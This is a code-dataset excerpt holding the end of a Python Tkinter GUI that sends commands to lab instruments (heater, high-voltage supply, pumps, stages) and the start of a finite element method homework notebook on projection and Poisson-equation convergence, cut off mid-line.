args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum += 1\n out = proc.stdout.readline()\n logging.debug(\"out = \" + out)\n finally:\n automation_lock.release()\n\ndef STAGEZUP_Thread():\n \"\"\"\n\n :return:\n \"\"\"\n global proc, cnum, automation_lock\n automation_lock.acquire()\n try:\n size = 94\n name = 'Pi'\n args = ''\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"STAGEZUP\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum += 1\n out = proc.stdout.readline()\n logging.debug(\"out = \" + out)\n finally:\n automation_lock.release()\n\n\ndef SXSAMPLE_Thread():\n \"\"\"\n\n :return:\n \"\"\"\n global proc, cnum, automation_lock\n automation_lock.acquire()\n try:\n size = 94\n name = 'Pi'\n args = ''\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"SXSAMPLE\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum += 1\n out = proc.stdout.readline()\n logging.debug(\"out = \" + out)\n finally:\n automation_lock.release()\n\n\ndef SXBUFFER_Thread():\n \"\"\"\n\n :return:\n \"\"\"\n global proc, cnum, automation_lock\n automation_lock.acquire()\n try:\n size = 94\n name = 'Pi'\n args = ''\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"SXBUFFER\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum += 1\n out = proc.stdout.readline()\n logging.debug(\"out = \" + out)\n finally:\n automation_lock.release()\n\ndef SXWATER_Thread():\n \"\"\"\n\n :return:\n \"\"\"\n global proc, cnum, automation_lock\n automation_lock.acquire()\n try:\n size = 94\n name = 'Pi'\n args = ''\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"SXWATER\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum += 1\n out = proc.stdout.readline()\n logging.debug(\"out = \" + out)\n finally:\n automation_lock.release()\n\ndef SXWASTE_Thread():\n \"\"\"\n\n :return:\n \"\"\"\n global proc, cnum, automation_lock\n automation_lock.acquire()\n try:\n size = 94\n name = 'Pi'\n args = ''\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"SXWASTE\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum += 1\n out = proc.stdout.readline()\n logging.debug(\"out = \" + out)\n finally:\n automation_lock.release()\n return\n\ndef STAGEZDN_Thread():\n \"\"\"\n\n :return:\n \"\"\"\n global proc, cnum, automation_lock\n automation_lock.acquire()\n try:\n size = 94\n name = 'Pi'\n args = ''\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"STAGEZDN\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum += 1\n out = proc.stdout.readline()\n logging.debug(\"out = \" + out)\n finally:\n automation_lock.release()\n\n\n\"\"\"\nHigh Voltage Power Supply\n\"\"\"\ndef GETVI_Thread2():\n \"\"\"\n I don't think I need this thread but just keep it as a reference...\n :return:\n \"\"\"\n counter = 0\n\n global proc\n global cnum\n size = 94\n name = 'HighVoltageSupply'\n args = ''\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"GETVI\", \"args\": args}\n while(counter<5):\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum+=1\n out = proc.stdout.readline()\n logging.debug(\"out = \" + out)\n time.sleep(5)\n counter+=1\n\ndef on_setv_button_click(entry):\n input = entry.get()\n global proc\n global cnum\n size = 94 + len(input)\n name = 'HighVoltageSupply'\n args = input\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"SETV\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n out = proc.stdout.readline()\n logging.debug(\"out = \"+out)\n cnum+=1\n\ndef GETVI_Thread():\n \"\"\"\n\n :return:\n \"\"\"\n global proc, cnum, automation_lock\n automation_lock.acquire()\n try:\n size = 94\n name = 'HighVoltageSupply'\n args = ''\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"GETVI\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum += 1\n out = proc.stdout.readline()\n logging.debug(\"out = \" + out)\n finally:\n automation_lock.release()\n\ndef SETV_Thread(set_vol=\"10\"):\n \"\"\"\n\n :param set_vol:\n :return:\n \"\"\"\n global proc, cnum, automation_lock\n automation_lock.acquire()\n try:\n set_vol = str(set_vol)\n size = 94 + len(set_vol)\n name = 'HighVoltageSupply'\n args = set_vol\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"SETV\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum += 1\n out = proc.stdout.readline()\n logging.debug(\"out = \"+out)\n finally:\n automation_lock.release()\n\ndef continuouse_GETVI():\n # global automation_lock\n\n setv_thread1 = Thread(target=SETV_Thread, kwargs={\"set_vol\": \"10\"})\n setv_thread1.start()\n min = 3\n t_end = time.time()+(60*min)\n # Loops for 3 minutes ^\n while time.time() < t_end:\n getvi_THREAD1 = Thread(target=GETVI_Thread)\n getvi_THREAD1.start()\n setv_thread0 = Thread(target=SETV_Thread, kwargs={\"set_vol\": \"0\"})\n setv_thread0.start()\n getvi_THREAD = Thread(target=GETVI_Thread)\n getvi_THREAD.start()\n\n getvi_THREAD1.join()\n setv_thread1.join()\n setv_thread0.join()\n getvi_THREAD.join()\n logging.info(\"Finished start_thread_button_click\")\n\ncnum = 1\n\n\"\"\"\nLuna Server Process\n\"\"\"\ncmd = [\n \"python\",\n \"../LunaSrv/lunasrv.py\"\n]\nglobal proc\n\n\"\"\"\nstart GUI\n\"\"\"\n\nclass LunaUI(Tk):\n def setReaderPipe(self, pipe):\n self._pipe = pipe\n\n def __init__(self):\n Tk.__init__(self)\n\n def quit(self):\n self.destroy()\n\n\nluna = LunaUI()\n\nif __name__ == '__main__':\n proc = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE)\n # Check if proc returned anything...\n if proc is None or proc.returncode is not None:\n if proc.returncode is not None:\n print (\"LunaSrv exited immediately with a return code\" + (str(proc.returncode)))\n else:\n print (\" Failed to start LunaSrv\")\n sys.exit(-1)\n \"\"\"\n Main difference here with Lock, Threads, along with the gui\n \"\"\"\n global automation_lock\n automation_lock = RLock()\n \"\"\"\n 1) Start reader_thread\n \"\"\"\n reader_thread = Thread(target=the_reader_thread)\n # Set the thread as a daemon thread, aka when the gui closes down, the thread also ends.\n reader_thread.daemon = True\n reader_thread.start()\n\n \"\"\"\"Title ('Optokey')\"\"\"\n luna.wm_title(\"Status Window\")\n title_label = Label(luna, text=\"DEMO GUI\", fg=\"green\", font=(\"Helvetica\", 16))\n title_label.grid(row=0, column=0, columnspan=8)\n\n current_status_label = Label(luna, text=\"Current Status\")\n current_status_label.grid(row=1, column=0, columnspan=4)\n list_box = Listbox(luna, width=40)\n list_box.grid(row=2, column=0, columnspan=4)\n\n #### START/SHUTDOWN ####\n\n start_shutdown_label = Label(luna, text=\"0) Start/Shutdown\")\n start_shutdown_label.grid(row=3, column=0, columnspan=2)\n start_button = Button(luna, text=\"START\", command=on_send_button_click)\n start_button.grid(row=3, column=2)\n\n shutdown_button = Button(luna, text=\"Shutdown\", command=shutdown_button_click)\n shutdown_button.grid(row=3, column=3)\n\n \"\"\"##### Capillary Heater #####\"\"\"\n capillary_heater_label = Label(luna, text=\"1) Capillary Heater: \")\n capillary_heater_label.grid(row=4, column=0, columnspan=4)\n\n turn_on_cap_heater_button = Button(luna, text=\"Turn On Heater\", command=CAPHEATON_Thread)\n turn_on_cap_heater_button.grid(row=5, column=0, columnspan=2)\n turn_off_cap_heater_button = Button(luna, text=\"Turn Off Heater\", command=CAPHEATOFF_Thread)\n turn_off_cap_heater_button.grid(row=5, column=2, columnspan=2)\n\n cap_heater_current_temp_label = Label(luna, text=\"Current Temp (C):\")\n cap_heater_current_temp_label.grid(row=6, column=0)\n cap_heater_current_temp = StringVar()\n cap_heater_current_temp_dynamic_label = Label(luna, textvariable=cap_heater_current_temp, width=10)\n cap_heater_current_temp_dynamic_label.grid(row=6, column=1, columnspan=2)\n gett_cap_heater_button = Button(luna, text=\"CAPGETT\", command=gett_cap_heater_button_click)\n gett_cap_heater_button.grid(row=6, column=3)\n\n cap_heater_set_temp_label = Label(luna, text=\"Set Temp (C):\")\n cap_heater_set_temp_label.grid(row=7, column=0)\n cap_heater_set_temp_entry = Entry(luna)\n cap_heater_set_temp_entry.grid(row=7, column=1, columnspan=2)\n\n sett_cap_heater_button = Button(luna, text=\"CAPSETT\",\n command=lambda: sett_cap_heater_button_click(cap_heater_set_temp_entry))\n sett_cap_heater_button.grid(row=7, column=3)\n\n \"\"\"High Voltage Supply\"\"\"\n high_voltage_label = Label(luna, text=\"2) High Voltage Supply\")\n high_voltage_label.grid(row=8, column=0, columnspan=4)\n\n voltage_label = Label(luna, text=\"Voltage (V):\")\n current_label = Label(luna, text=\"Current (A):\")\n\n voltage_label.grid(row=9, column=0)\n current_label.grid(row=9, column=2)\n\n current_volts = StringVar()\n current_amps = StringVar()\n\n current_volts_dynamic_label = Label(luna, textvariable=current_volts, width=10)\n current_amps_dynamic_label = Label(luna, textvariable=current_amps, width=10)\n current_volts_dynamic_label.grid(row=10, column=1)\n current_amps_dynamic_label.grid(row=10, column=3)\n\n getvi_button = Button(luna, text=\"GETVI\", command=GETVI_Thread)\n getvi_button.grid(row=11, column=3)\n\n # Set voltage row on GUI\n set_voltage_label = Label(luna, text=\"set volt:\")\n set_voltage_label.grid(row=11, column=0)\n set_voltage_entry = Entry(luna)\n set_voltage_entry.grid(row=11, column=1)\n setv_button = Button(luna, text=\"SETV\", command=lambda: on_setv_button_click(set_voltage_entry))\n setv_button.grid(row=11, column=2)\n \"\"\"##### Laser Motor #####\"\"\"\n laser_motor_label = Label(luna, text=\"3) Laser Motor\")\n laser_motor_label.grid(row=12, column=0, columnspan=4)\n\n lm_moveleft_button = Button(luna, text=\"LASLEFT\", command=continuouse_GETVI)\n lm_moveleft_button.grid(row=13, column=1)\n lm_moveright_button = Button(luna, text=\"LASRIGHT\", command=LASRIGHT_Thread)\n lm_moveright_button.grid(row=13, column=2)\n\n lm_lmhome_button = Button(luna, text=\"LMHOME\", command=LMHOME_Thread)\n lm_lmhome_button.grid(row=14, column=1)\n lm_capready_button = Button(luna, text=\"CAPREADY\", command=CAPREADY_Thread)\n lm_capready_button.grid(row=14, column=2)\n\n \"\"\"##### Gel Pump #####\"\"\"\n gel_pump_label = Label(luna, text=\"4) gel_pump\")\n gel_pump_label.grid(row=15, column=0, columnspan=4)\n\n gp_home_button = Button(luna, text=\"GPHOME\", command=GPHOME_Thread)\n gp_home_button.grid(row=16, column=1)\n\n gp_start_button = Button(luna, text=\"GPSTART\", command=GPSTART_Thread)\n gp_start_button.grid(row=16, column=2)\n\n gp_up_button = Button(luna, text=\"GPUP\", command=gp_up_button_click)\n gp_up_button.grid(row=18, column=1)\n\n gp_down_button = Button(luna, text=\"GPDOWN\", command=gp_down_button_click)\n gp_down_button.grid(row=18, column=2)\n\n \"\"\" Stage X and Z\"\"\"\n stage_x_and_z_label = Label(luna, text=\"5) Solution Stage X and Z\")\n stage_x_and_z_label.grid(row=20, column=0, columnspan=4)\n\n z_moveup_button = Button(luna, text=\"ZUP\", command=STAGEZUP_Thread)\n z_moveup_button.grid(row=21, column=2)\n z_movedown_button = Button(luna, text=\"ZDOWN\", command=STAGEZDN_Thread)\n z_movedown_button.grid(row=22, column=2)\n\n x_sample_button1 = Button(luna, text=\"LEFT\", command=go_to_sample)\n x_sample_button1.grid(row=24, column=0)\n\n x_sample_button = Button(luna, text=\"SXSAMPLE\", command=go_to_sample)\n x_sample_button.grid(row=24, column=0)\n x_buffer_button = Button(luna, text=\"SXBUFFER\", command=go_to_buffer)\n x_buffer_button.grid(row=24, column=1)\n x_water_button = Button(luna, text=\"SXWATER\", command=go_to_water)\n x_water_button.grid(row=24, column=2)\n x_waste_button = Button(luna, text=\"SXWASTE\", command=go_to_waste)\n x_waste_button.grid(row=24, column=3)\n \"\"\"##### Fluidic Valve #####\"\"\"\n fluidic_valve_label = Label(luna, text=\"6) LAB SMITH Fluid Valve: \")\n fluidic_valve_label.grid(row=25, column=0, columnspan=4)\n\n valve_set = IntVar()\n valve_set.set(3)\n valve_options = [\n (\"A\", 1),\n (\"B\", 2),\n (\"CLOSED\", 3)\n ]\n for txt, val in valve_options:\n radio_button = Radiobutton(luna, text=txt, variable=valve_set, command=set_fluidic_valve_clicked, value=val)\n radio_button.grid(row=26, column=val)\n\n \"\"\"##### Spectrometer #####\"\"\"\n # spectrometer_label = Label(luna, text=\"8) Spectrometer: \")\n # spectrometer_label.grid(row=27, column=0, columnspan=4)\n #\n # set_exposure_time_label = Label(luna, text=\"set exposure time:\")\n # set_exposure_time_label.grid(row=28, column=0)\n # set_exposure_time_entry = Entry(luna)\n # set_exposure_time_entry.grid(row=28, column=1, columnspan=2)\n # set_exposure_time_button = Button(luna, text=\"SPCSETEXP\",\n # command=lambda: spectrometer_set_exposure_time_clicked(set_exposure_time_entry))\n # set_exposure_time_button.grid(row=28, column=3)\n #\n # set_spectrometer_filename_label = Label(luna, text=\"filename:\")\n # set_spectrometer_filename_label.grid(row=29, column=0)\n # set_spectrometer_filename_entry = Entry(luna)\n # set_spectrometer_filename_entry.grid(row=29, column=1)\n #\n # set_spectrometer_time_between_label = Label(luna, text=\"time between reads (ms):\")\n # set_spectrometer_time_between_label.grid(row=29, column=2)\n # set_spectrometer_time_between_entry = Entry(luna)\n # set_spectrometer_time_between_entry.grid(row=29, column=3)\n #\n # set_spectrometer_duration_label = Label(luna, text=\"duration (ms):\")\n # set_spectrometer_duration_label.grid(row=30, column=0)\n # set_spectrometer_duration_entry = Entry(luna)\n # set_spectrometer_duration_entry.grid(row=30, column=1)\n #\n # start_continuous_spectrometer_button = Button(luna,\n # text=\"SPCSTARTC\",\n # command=lambda: start_spectrometer_continuous_capture(\n # set_spectrometer_filename_entry,\n # set_spectrometer_time_between_entry,\n # set_spectrometer_duration_entry))\n # start_continuous_spectrometer_button.grid(row=30, column=2)\n # start_continuous_spectrometer_button = Button(luna, text=\"SPCISCRUN\", command=check_continous_capture)\n # start_continuous_spectrometer_button.grid(row=30, column=3)\n\n kill_pi_button = Button(luna, text=\"kill pi\", command=kill_pi_clicked)\n kill_pi_button.grid(row=31, column=1)\n\n start_automation_button = Button(luna, text=\"START AUTO\", command=pt1_run_state_sequence)\n start_automation_button.grid(row=31, column=2)\n\n \"\"\"\n Turn off gui, then terminate the subproccess\n \"\"\"\n luna.mainloop()\n proc.terminate()","sub_path":"LunaGUI/demo_automation2.py","file_name":"demo_automation2.py","file_ext":"py","file_size_in_byte":39779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"265511078","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Part A: Code\n\n# ### QOL\n\n# In[1]:\n\n\nimport warnings\nwarnings.filterwarnings('ignore')\n\n# To save .png or not to save .png, that is the question\nsave = True\n\n\n# ### Helper Libraries\n\n# In[2]:\n\n\nimport numpy as np\nimport scipy.sparse as spsp\nfrom scipy.sparse.linalg import spsolve\nimport scipy.integrate as integrate\nfrom scipy.misc import derivative\nimport matplotlib.pyplot as plt\n\n\n# ### Utility Classes\n\n# In[3]:\n\n\nclass Mesh:\n def __init__(self, points):\n # self.p array with the node points (sorted) type : np.array dim: (n_p)\n # self.n_p number of node points type : int\n # self.s array with indices of points per type : np.array dim: (n_s, 2) \n # segment \n # self.n_s number of segments type : int\n # self.bc. array with the indices of boundary type : np.array dim: (2)\n # points\n\n self.p = points\n self.n_p = np.size(points,0)\n\n self.s = np.vstack((range(self.n_p-1),range(1,self.n_p))).T\n self.n_s = self.n_p-1\n\n self.bc = [0, self.n_p-1]\n\n\nclass V_h:\n def __init__(self, mesh):\n # self.mesh Mesh object containg geometric info type: Mesh\n # self.dim dimension of the space type: int\n\n self.mesh = mesh\n self.dim = mesh.p.shape[0]\n\n def eval(self, xi, x):\n \"\"\" evaluation of the piece wise local polynomial given by\n the coefficients xi, at the point x \n \"\"\"\n\n # compute the index of the interval in which x is contained\n # Assumes valid input\n # Could optimize further with arrays\n num = False\n \n if type(x) is not np.ndarray and type(x) is not list:\n x_list = [x]\n num = True\n else:\n x_list = x\n x_list = np.array(x_list)\n \n out = []\n for xx in x_list:\n for i,p in enumerate(self.mesh.p):\n if p > xx:\n break\n i-=1\n\n # compute the size of the interval\n h = self.mesh.p[i+1]-self.mesh.p[i]\n\n # here return the value of the function\n if i == np.size(xi)-1:\n ret = xi[i]\n else:\n ret = xi[i]*(1-(xx-self.mesh.p[i])/h) + xi[i+1]*(xx-self.mesh.p[i])/h\n out.append(ret)\n\n if num:\n return out[0]\n return np.array(out)\n\nclass Function:\n def __init__(self, xi, v_h):\n self.xi = xi\n self.v_h = v_h\n\n def __call__(self,x):\n # wrapper for calling eval in V_h\n v_h = self.v_h\n\n # use the function defined in v_h\n return v_h.eval(self.xi, x)\n\n\n# ### Finite Element Method\n\n# In[4]:\n\n\ndef mass_matrix(v_h):\n # sparse matrix easy to change sparsity pattern\n # this initializes an empty sparse matrix of \n # size v_h.dim x v_h.dim\n M = spsp.lil_matrix((v_h.dim,v_h.dim))\n\n # for loop\n for i in range(v_h.mesh.n_s):\n # extract the indices\n inx = v_h.mesh.s[i]\n\n # compute the lengh of the segment\n h = v_h.mesh.p[inx[1]]-v_h.mesh.p[inx[0]]\n\n # add the values to the matrix\n M[i:i+2,i:i+2] += h*(np.identity(2)+1)/6\n\n return M\n\n\ndef stiffness_matrix(v_h, sigma):\n # matrix easy to change sparsity pattern\n S = spsp.lil_matrix((v_h.dim,v_h.dim))\n\n # for loop\n for i in range(v_h.mesh.n_s):\n # extract the indices\n inx = v_h.mesh.s[i]\n\n # compute the lengh of the segment\n h = v_h.mesh.p[inx[1]]-v_h.mesh.p[inx[0]]\n\n # sample sigma\n a_i = sigma((inx[1]+inx[0])/2)\n\n # update the stiffness matrix\n S[i:i+2,i:i+2] += (a_i/h)*(2*np.identity(2)-1)\n \n # No Kappa\n return S[1:-1,1:-1]\n\n# show differences between Trapezoidal rule and Simpson rule\ndef load_vector(v_h, f):\n # allocate the vector\n b = np.zeros(v_h.dim)\n\n # for loop over the segments\n for i in range(v_h.mesh.n_s):\n # extracting the indices\n inx = v_h.mesh.s[i]\n\n # computing the length of the interval \n h = v_h.mesh.p[inx[1]]-v_h.mesh.p[inx[0]]\n\n # update b\n b[i:i+2] += h*np.array([f(v_h.mesh.p[inx[0]]), f(v_h.mesh.p[inx[1]])]).T/2\n\n return b\n\n\ndef source_assembler(v_h, f, sigma, u_dirichlet):\n # computing the load vector (use the function above)\n b = load_vector(v_h,f)\n\n # extract the interval index for left boundary\n i_left = v_h.mesh.bc[0]\n\n # compute the length of the interval\n h = v_h.mesh.p[i_left+1]-v_h.mesh.p[i_left]\n\n # sample sigma at the middle point\n a_left = sigma((v_h.mesh.p[i_left+1]+v_h.mesh.p[i_left])/2)\n\n # update the source_vector\n b[1] += a_left/h * u_dirichlet[0]\n\n\n # extract the interval index for the right boudanry\n i_right = v_h.mesh.bc[1]\n\n # compute the length of the interval\n h = v_h.mesh.p[i_right]-v_h.mesh.p[i_right-1]\n \n # sample sigma at the middle point\n a_right = sigma((v_h.mesh.p[i_right]+v_h.mesh.p[i_right-1])/2)\n\n # update the source_vector\n b[-2] += a_right/h * u_dirichlet[1]\n\n # return only the interior nodes\n return b[1:-1]\n\n\ndef solve_poisson_dirichelet(v_h, f, sigma, \n u_dirichlet=np.zeros((2)) ):\n \"\"\" function to solbe the Poisson equation with \n Dirichlet boundary conditions\n input: v_h function space\n f load (python function)\n sigma conductivity\n u_dirichlet boundary conditions\n output: u approximation (Function class)\n \"\"\" \n\n # we compute the stiffness matrix, we only use the \n # the interior dof, and we need to convert it to \n # a csc_matrix\n S = spsp.csc_matrix(stiffness_matrix(v_h,sigma))\n # we build the source\n b = source_assembler(v_h,f,sigma,u_dirichlet)\n # solve for the interior degrees of freedom\n u_interior = spsolve(S,b)\n # concatenate the solution to add the boundary \n # conditions\n xi_u = np.concatenate([u_dirichlet[:1], \n u_interior, \n u_dirichlet[1:]])\n\n # return the function\n return Function(xi_u, v_h)\n\n\n# ### Projection/Interpolation Functions\n\n# In[5]:\n\n\ndef pi_h(v_h, f):\n \"\"\"interpolation function\n input: v_h function space\n f function to project\n output: pih_f function that is the interpolation \n of f into v_h\n \"\"\"\n pi_h_f = -1\n pass\n\n return pi_h_f\n\n\ndef p_h(v_h, f):\n \"\"\"projection function\n input: v_h function space\n f function to project\n output: ph_f function that is the projection \n of f into v_h\n \"\"\"\n # compute load vector\n b = load_vector(v_h,f)\n\n # compute Mass matrix and convert it to csc type\n M = spsp.csc_matrix(mass_matrix(v_h))\n\n # solve the system\n xi = spsolve(M,b)\n\n # create the new function (this needs to be an instance)\n # of a Function class\n ph_f = Function(xi,v_h)\n\n return ph_f\n\n\n# ### Verification Code\n\n# In[6]:\n\n\n# Verify utility functionality\nx = np.linspace(0,1,11)\nmesh = Mesh(x)\nv_h = V_h(mesh)\n\nf_load = lambda x: x**2\nxi = f_load(x)\nu = Function(xi, v_h) \nassert np.abs(u(x[5]) - f_load(x[5])) < 1.e-6\nmid = (x[5] + x[6])/2\nassert np.abs(u(mid) - f_load(mid)) < 1.e-2\n\n# Verify projection\nf_load = lambda x: 2+x*0\nph_f = p_h(v_h, f_load)\nph_f2 = p_h(v_h, ph_f)\nassert np.max(ph_f.xi - ph_f2.xi) < 1.e-1\n\n# Analytical solution\nu = lambda x : np.sin(4.5*np.pi*x)\n# Build source file\nf = lambda x : (4.5*np.pi)**2*np.sin(4.5*np.pi*x)\n# Boundary conditions\nu_dirichlet = [u(0),u(1)]\n# Constant Conductivity\nsigma = lambda x : 1 + 0*x\n\n# Solve\nu_sol = solve_poisson_dirichelet(v_h, f, sigma, u_dirichlet)\n\n# Estimate error\nerr = lambda x: np.square(u_sol(x) - u(x))\nl2_err = np.sqrt(integrate.quad(err, 0.0,1.)[0])\n\nprint(\"L^2 error using %d points is %.6f\"% (v_h.dim, l2_err))\n# this should be quite large\n\n# Use a finer mesh\nx = np.linspace(0,1,41)\nmesh = Mesh(x)\nv_h = V_h(mesh)\n\n# Solve\nu_sol = solve_poisson_dirichelet(v_h, f, sigma, u_dirichlet)\n\n# Estimate error\nerr = lambda x: np.square(u_sol(x) - u(x))\nl2_err = np.sqrt(integrate.quad(err, 0.0,1.)[0])\n\n# Debugging step\nif False:\n for i in range(21):\n print([u_sol(i/20),u(i/20)])\n \n# print the error\nprint(\"L^2 error using %d points is %.6f\"% (v_h.dim, l2_err))\n\n\n# # Problem B: Showcase Projection Convergence Properties\n\n# # Part B.1: h^4 Error Convergence\n\n# In[7]:\n\n\n# Define f\nf=lambda x : np.cos(12*np.pi*x)\n\n# Take Samples\ndata=[]\nfor n in range(10,105,5):\n # Define Mesh\n x = np.linspace(0,1,n+1)\n mesh = Mesh(x)\n v_h = V_h(mesh)\n\n # Calculate Projection\n ph_f = p_h(v_h, f)\n\n # Estimate error\n err = lambda x : np.square(f(x) - ph_f(x))\n l2_err_sq = integrate.quad(err, 0.0,1.)[0]\n\n # Print\n data.append([1/n,l2_err_sq])\ndata=np.array(data)\n\n# Data for plotting\nfig,pl = plt.subplots(2,1)\nfor i in range(len(pl)):\n pl[i].plot(data[:,0],1.2e+3*data[:,0]**3,\n label=\"h^3 reference\",color=\"yellow\")\n pl[i].plot(data[:,0],1.6e+5*data[:,0]**5,\n label=\"h^5 reference\",color=\"red\")\n pl[i].plot(data[:,0],1.6e+4*data[:,0]**4,\n label=\"h^4 reference\",color=\"orange\")\n pl[i].plot(data[:,0],data[:,1],\n label=\"Results\",color=\"turquoise\")\n \n pl[i].grid()\n if i==0:\n pl[i].set(ylabel=\"$L^2$ Squared Error\",\n title=\"Error by h\")\n pl[i].legend()\n elif i==len(pl)-1:\n pl[i].set(xlabel=\"h\")\n \n data = data[int(len(data)/2):]\n\nif save:\n fig.savefig(\"B.1.png\")\nplt.show()\n\n\n# # Part B.2: Second Derivative Norm Convergence\n\n# In[8]:\n\n\n# Take Samples\ndata=[]\nfor c in range(1,21):\n # Define f\n f=lambda x : np.cos(c*np.pi*x)\n # Define f''\n f_2der=lambda x : -(c*np.pi)**2*np.cos(c*np.pi*x)\n \n # Define Mesh\n x = np.linspace(0,1,51)\n mesh = Mesh(x)\n v_h = V_h(mesh)\n\n # Calculate Projection\n ph_f = p_h(v_h, f)\n\n # Estimate error\n err = lambda x : np.square(f(x) - ph_f(x))\n l2_err_sq = integrate.quad(err, 0.0,1.)[0]\n f2 = lambda x : np.square(f_2der(x))\n # We can sample the whole function because h_i = h_j\n l2_2der_sq = integrate.quad(f2, 0.0,1.)[0]\n\n # Print\n data.append([l2_2der_sq,l2_err_sq])\ndata=np.array(data)\n\n# Data for plotting\nfig,pl = plt.subplots(2,1)\nfor i in range(len(pl)):\n pl[i].plot(data[:,0],data[:,1],\n label=\"Results\",color=\"turquoise\")\n \n pl[i].grid()\n if i==0:\n pl[i].set(ylabel=\"$L^2$ Squared Error\",\n title=\"Error by h\")\n pl[i].legend()\n elif i==len(pl)-1:\n pl[i].set(xlabel=\"$L^2$ Squared $f''$ Norm\")\n \n data = data[:int(len(data)/8)]\n\nif save:\n fig.savefig(\"B.2.png\")\nplt.show()\n\n\n# ### Part B.3: Counter-Example\n\n# In[9]:\n\n\n# Take Samples\ndata=[]\nfor c in range(1,21):\n # Define f (Can't use something like 1/x; Homogeneous/Dirichlet)\n f=lambda x : c/x\n # Define f''\n f_2der=lambda x : c*2/(x**3)\n \n # Define Mesh\n x = np.linspace(0,1,51)\n mesh = Mesh(x)\n v_h = V_h(mesh)\n\n # Calculate Projection\n ph_f = p_h(v_h, f)\n\n # Estimate error\n err = lambda x : np.square(f(x) - ph_f(x))\n l2_err_sq = integrate.quad(err, 0.0,1.)[0]\n f2 = lambda x : np.square(f_2der(x))\n # We can sample the whole function because h_i = h_j\n l2_2der_sq = integrate.quad(f2, 0.0,1.)[0]\n\n # Print\n data.append([l2_2der_sq,l2_err_sq])\ndata=np.array(data)\n\n# Data for plotting\nfig,pl = plt.subplots(2,1)\nfor i in range(len(pl)):\n pl[i].plot(data[:,0],data[:,1],\n label=\"Results\",color=\"turquoise\")\n \n pl[i].grid()\n if i==0:\n pl[i].set(ylabel=\"$L^2$ Squared Error\",\n title=\"Error by h\")\n pl[i].legend()\n elif i==len(pl)-1:\n pl[i].set(xlabel=\"$L^2$ Squared $f''$ Norm\")\n \n data = data[:int(len(data)/8)]\n\nif save:\n fig.savefig(\"B.3.png\")\nplt.show()\n\n\n# # Problem C\n\n# ### Part C.a: Estimate Showcase\n\n# In[10]:\n\n\n# Analytical solution\nu = lambda x : np.sin(2*np.pi*x)\n# Build source file\nf = lambda x : (2*np.pi)**2*np.sin(2*np.pi*x)\n# Boundary conditions\nu_dirichlet = [u(0),u(1)]\n# Constant Conductivity\nsigma = lambda x : 1 + 0*x\n\n# Take Samples\ndata=[]\nfor n in range(10,105,5):\n # Create Mesh\n x = np.linspace(0,1,n+1)\n mesh = Mesh(x)\n v_h = V_h(mesh)\n\n # Solve\n u_sol = solve_poisson_dirichelet(v_h, f, sigma, u_dirichlet)\n\n # Estimate error\n diff = lambda x : u(x)-u_sol(x)\n # Take an FD estimation of (u - u_h)'\n err = lambda x : np.square(derivative(diff,x,dx=1e-3/n,n=1))\n l2_err_sq = integrate.quad(err, 0.0,1.)[0]\n \n data.append([1/n,l2_err_sq])\ndata=np.array(data)\n\n# Data for plotting\nfig,pl = plt.subplots(2,1)\nfor i in range(len(pl)):\n pl[i].plot(data[:,0],7e+1*data[:,0]**2,\n label=\"h^2 reference\",color=\"orange\")\n pl[i].plot(data[:,0],data[:,1],\n label=\"Results\",color=\"turquoise\")\n pl[i].grid()\n if i==0:\n pl[i].set(ylabel=\"$L^2$ Squared Derivative Error\",\n title=\"Error by h\")\n pl[i].legend()\n elif i==len(pl)-1:\n pl[i].set(xlabel=\"h\")\n \n data = data[int(len(data)/2):]\n\nif save:\n fig.savefig(\"C.a.png\")\nplt.show()\n\n\n# ### Part C.b.1: Adaptive Mesh Comparison\n\n# In[ ]:\n\n\n# Define domain length\nL=2\n\n# Create sources\nsigma = lambda x : .1 + 0*x\nf = lambda x : np.exp(-(x-L/2)**2/(2*sigma(x)))\nu_dirichlet = [0,0]\n\n# Find reference solution\nx_fine = np.linspace(0,L,1001)\nv_h_fine = 